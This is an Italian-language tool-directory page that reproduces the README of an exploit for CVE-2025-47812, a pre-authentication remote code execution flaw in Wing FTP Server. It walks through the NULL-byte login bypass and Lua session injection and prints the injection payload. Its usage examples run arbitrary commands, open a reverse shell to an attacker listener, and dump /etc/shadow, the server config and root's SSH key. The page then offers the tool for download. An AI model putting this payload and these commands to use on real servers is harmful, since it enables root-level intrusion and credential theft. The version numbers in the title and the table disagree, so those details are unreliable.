Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-47812 — RCE per WingFTP v4.7.3 | Kitploit
Strumenti/GitHubGitHub/popyue/cve-2025-47812
ExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneStrumento di Accesso RemotoSviluppo Payload
GitHubpopyue/cve-2025-47812

CVE-2025-47812

RCE per WingFTP v4.7.3

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-47812 — Wing FTP Server RCE non autenticata

root@kitploit:~
 ██╗    ██╗██╗███╗   ██╗ ██████╗     ███████╗████████╗██████╗
 ██║    ██║██║████╗  ██║██╔════╝     ██╔════╝╚══██╔══╝██╔══██╗
 ██║ █╗ ██║██║██╔██╗ ██║██║  ███╗    █████╗     ██║   ██████╔╝
 ██║███╗██║██║██║╚██╗██║██║   ██║    ██╔══╝     ██║   ██╔═══╝
 ╚███╔███╔╝██║██║ ╚████║╚██████╔╝    ██║        ██║   ██║
  ╚══╝╚══╝ ╚═╝╚═╝  ╚═══╝ ╚═════╝     ╚═╝        ╚═╝   ╚═╝

Panoramica

CampoDettaglio
CVECVE-2025-47812
Versioni interessateWing FTP Server <= 7.4.3
Versione correttaWing FTP Server 7.4.4
CVSS10.0 (Critico)
Autenticazione richiestaNessuna (login anonimo sufficiente)
Privilegi ottenutiroot (Linux) / NT AUTHORITY\SYSTEM (Windows)
Scoperto daJulien Ahrens (@MrTuxracer) — rcesecurity.com

Descrizione della vulnerabilità

L'interfaccia web di Wing FTP Server è vulnerabile a un attacco di Remote Code Execution (esecuzione di codice in remoto) pre-autenticazione in due fasi.

Fase 1 — Bypass dell'autenticazione con NULL byte + iniezione di codice Lua

La funzione c_CheckUser() nel binario di Wing FTP usa internamente strlen(), che tronca la stringa del nome utente al primo NULL byte (\x00). Ciò significa che un nome utente come anonymous%00<dati_arbitrari> supera l'autenticazione purché anonymous (o qualsiasi utente valido) esista.

Dopo che l'autenticazione riesce, loginok.html chiama rawset(_SESSION, "username", username) usando il parametro POST completo e non sanitizzato — inclusi tutti i dati dopo il NULL byte. La sessione viene poi serializzata in un file script Lua su disco tramite SessionModule.save().

Poiché la funzione di serializzazione racchiude i valori stringa in letterali Lua di stringa lunga [[...]] senza alcuna sanitizzazione, iniettare ]] nel nome utente termina il letterale di stringa prematuramente, consentendo di aggiungere codice Lua arbitrario al file di sessione.

Struttura del payload:

root@kitploit:~
anonymous\x00]]
local h = io.popen("id")
local r = h:read("*a")
h:close()
print(r)
--

Il -- finale commenta la ]] che Wing FTP aggiunge dopo il valore.

Fase 2 — Attivazione tramite endpoint autenticato

Il file di sessione (chiamato in base al valore del cookie UID) è uno script Lua che viene eseguito tramite loadfile() + f() ogni volta che viene acceduto a un endpoint autenticato. L'invio di POST /dir.html con il cookie UID esegue il Lua iniettato e restituisce l'output del comando nel corpo della risposta, prima del contenuto <?xml.


Requisiti

  • Python 3.10+
  • requests, urllib3
root@kitploit:~
pip install -r requirements.txt

Utilizzo

root@kitploit:~
usage: CVE-2025-47812 [-h] [-U USER] [-P PASS] [--vhost HOST] [--timeout N]
                      [--verify-ssl]
                      [--cmd CMD | --shell | --revshell | --dump]
                      [--lhost IP] [--lport PORT] [--listen]
                      target

Esempi

root@kitploit:~
# Comando singolo
python3 CVE-2025-47812.py http://ftp.target.com --cmd "id"
python3 CVE-2025-47812.py http://ftp.target.com --cmd "cat /etc/passwd"

# Target per IP (Wing FTP usa il routing per virtual-host — fornisci l'hostname con --vhost)
python3 CVE-2025-47812.py http://10.10.10.10 --vhost ftp.target.com --cmd "id"

# Pseudo-shell interattiva
python3 CVE-2025-47812.py http://ftp.target.com --shell

# Reverse shell (avvia prima un listener nc separato)
python3 CVE-2025-47812.py http://ftp.target.com --revshell --lhost 10.10.14.5 --lport 4444

# Reverse shell con listener integrato
python3 CVE-2025-47812.py http://ftp.target.com --revshell --listen --lhost 10.10.14.5 --lport 4444

# Estrai file sensibili (/etc/passwd, /etc/shadow, Wing.cfg, chiave SSH di root)
python3 CVE-2025-47812.py http://ftp.target.com --dump

# Con credenziali non anonime
python3 CVE-2025-47812.py http://ftp.target.com -U ftpuser -P secret --cmd "whoami"

Rimedio

Aggiornare Wing FTP Server alla versione 7.4.4 o successiva.


Riferimenti

  • Analisi originale: https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
  • Correlati: CVE-2025-47811 (privilegi di servizio eccessivamente permissivi), CVE-2025-47813 (divulgazione del percorso tramite cookie UID eccessivamente lungo)

Dichiarazione di non responsabilità

Questo strumento è fornito solo a scopo educativo e per test di penetrazione autorizzati. Eseguire questo exploit contro sistemi di cui non si è proprietari o per cui non si ha un'esplicita autorizzazione scritta è illegale e non etico. L'autore non si assume alcuna responsabilità per un uso improprio.

Scarica lo strumento